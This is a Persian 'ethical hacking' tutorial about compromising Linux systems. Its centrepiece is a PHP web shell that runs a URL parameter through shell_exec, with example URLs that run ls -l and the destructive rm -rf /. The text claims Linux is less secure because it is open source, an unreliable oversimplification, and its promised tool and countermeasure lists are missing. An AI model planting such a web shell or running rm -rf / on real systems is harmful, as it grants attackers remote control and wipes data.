درود بر شما عزیزان و کاربران سایت پی وی لرن. با آموزش رایگان هک قانونمند در خدمتتون هستیم.
تا کنون روش های هک یک وب سرور و یک وبسایت رو مشاهده نمودیم. در این قسمت می خواهیم روش هک کردن سیستم های لینوکس رو مورد بررسی قرار دهیم. برای هک کردن به ابزارهایی نیاز است، بنابراین این ابزار ها را معرفی نموده و همچنین راه های جلوگیری از هک در لینوکس رو خواهیم داشت. خب دوستان بدون معطلی میریم سراغ روش هک کردن سیستم های لینوکس. با این آموزش همراه ما باشین.
لینوکس منبع باز است این بدان معنی است که هر کسی می تواند به کد منبع دسترسی داشته باشد. این امر باعث می شود که آن در مقایسه با سیستم عامل های دیگر دارای امنیت کم تری باشد زیرا مهاجمان می توانند کد منبع را برای یافتن آسیب پذیری مطالعه کنند. هک کردن لینوکس برای بهره برداری از این آسیب پذیری ها به هدف دستیابی به دسترسی غیر مجاز به یک سیستم می باشد.
در این بخش، ما به شما آن چه که موجب آسیب پذیری های امنیتی در لینوکس می شود و اقدامات متقابلی که از این حملات می تواند جلوگیری کند را معرفی می کنیم.
لینوکس یک سیستم عامل منبع باز است. توزیع های زیادی از سیستم عامل های مبتنی بر لینوکس مانند Redhat, Fedora, و Ubuntu و غیره وجود دارد. بر خلاف سایر سیستم عامل ها، لینوکس امنیت کم تری دارد. این به این دلیل است که کد منبع به طور رایگان در دسترس است، بنابراین مطالعه در مورد آسیب پذیری ها و بهره برداری از آن ها در مقایسه با دیگر سیستم عامل هایی که منبع باز نیستند، راحت تر است. لینوکس را می توان به عنوان یک سرور، دسک تاپ، تبلت یا سیستم عامل دستگاه تلفن همراه استفاده کرد.
برنامه های لینوکس را می توان با استفاده از رابط کاربری GUI یا دستورات مدیریت کرد. دستورالعمل ها در مقایسه با استفاده از GUI موثرتر و کارآمدتر هستند. به همین دلیل کمک می کند تا دستورات پایه لینوکس را بدانیم.
می توان آن را در http://www-arc.com/sara/sara.html یافت .
لیست فوق کامل نیست و فقط به شما یک ایده از ابزارهای موجود برای هک کردن سیستم های لینوکس را می دهد.
هک سیستم عامل لینوکس از آسیب پذیری های موجود در سیستم عامل استفاده می کند. یک سازمان می تواند سیاست های زیر را برای محافظت از خود و و کاربرانش در مقابل چنین حملاتی اتخاذ کند.
در این سناریوی عملی، شما را با اطلاعات پایه ای در مورد چگونگی استفاده از پی اچ پی برای به خطر انداختن یک سیستم عامل لینوکس آشنا می سازیم. اما قصد نداریم هر قربانی را هدف بگیریم. اگر می خواهید آن را امتحان کنید، می توانید LAMPP را بر روی دستگاه محلی خود نصب کنید.
پی اچ پی با دو توابعی که می تواند برای اجرای دستورات لینوکس مورد استفاده قرار گیرد، می آید. آن توابع ()exec و ()shell_exec را دارد. تابع ()exec آخرین خط خروجی دستور را باز می گرداند در حالی که ()shell_exec کل نتایج فرمان را به عنوان یک رشته باز می گرداند.
حال فرض کنید که مدیران مهاجم فایل زیر را در یک سرور وب آپلود کرده اند.
1 2 3 4 5 6 7 8 9 10 11 | <?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?> |
http://localhost/cp/konsole.php?cmd=ls%20-l
“konsole.php?cmd=ls%20-l…” مقدار ls -l را به متغیر cmd اختصاص می دهد.
1 | shell_exec('ls -l') ; |
اجرای کد بالا در یک سرور وب نتایج مشابهی به دست می دهد.
دستور بالا به سادگی فایل ها را در دایرکتوری فعلی و مجوز ها نمایش می دهد.
فرض کنید مهاجم دستور زیر را اجرا می کند.
1 | rm -rf / |
حمله URL به نظر می رسد چیزی شبیه به این باشد:
/http://localhost/cp/konsole.php?cmd=rm%20-rf%20
روش هک کردن سیستم های لینوکس رو در همین جا به پایان می رسونیم.
دوستان عزیز و همراه سایت آموزشی پی وی لرن با مبحث روش هک کردن سیستم های لینوکس در خدمتتون بودیم. همون طور که دیدید لینوکس نسبت به دیگر سیستم عامل ها به خاطر منبع باز بودن از امنیت کم تری برخوردار است. به دلیل اهمیت این موضوع، روش هک کردن سیستم های لینوکس رو همراه هک یک سیستم لینوکس Ubuntu با استفاده از PHP بررسی نمودیم. تا در مسائل امنیتی که همانا موجب حفظ حریم خصوصی و اطلاعات و داده های مهم و حساس می شود بیش تر دقت کنیم.